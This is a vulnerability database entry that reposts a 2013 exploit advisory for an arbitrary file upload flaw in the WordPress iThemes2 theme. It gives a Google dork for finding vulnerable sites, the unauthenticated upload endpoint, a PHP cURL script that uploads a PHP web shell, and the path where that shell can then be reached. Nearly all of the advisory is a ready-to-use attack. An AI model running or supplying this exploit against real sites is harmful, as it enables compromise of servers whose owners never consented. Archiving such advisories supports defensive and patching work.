Lucene search
K

WordPress iThemes2 Shell Upload

🗓️ 20 Nov 2013 00:00:00Reported by DevilScreaMType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

WordPress iThemes2 Themes Arbitrary File Upload. Vendor: themify.m

Code
`#Title : Wordpress iThemes2 Themes Arbitrary File Upload   
  
#Author : DevilScreaM  
  
#Date : 11/20/2013 - 20 November 2013  
  
#Category : Web Applications  
  
#Type : PHP  
  
#Vendor : http://themify.me/  
  
#Link : http://themify.me/themes/ithemes2  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Tested : Mozila, Chrome, Opera -> Windows & Linux  
  
#Vulnerabillity : Arbitrary File Upload  
  
#Dork :  
  
inurl:wp-content/themes/ithemes2  
  
  
Arbitrary File Upload  
  
Exploit : http://SITE-TARGET/wp-content/themes/ithemes2/themify/themify-ajax.php  
  
Script :  
  
<?php  
$uploadfile="devilscream.php";  
$ch = curl_init("http://127.0.0.1/wp-content/themes/ithemes2/themify/themify-ajax.php?upload=1");  
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('Filedata'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
  
  
Shell Access :  
  
http://SITE-TARGET/wp-content/themes/ithemes2/uploads/devilscream.php  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation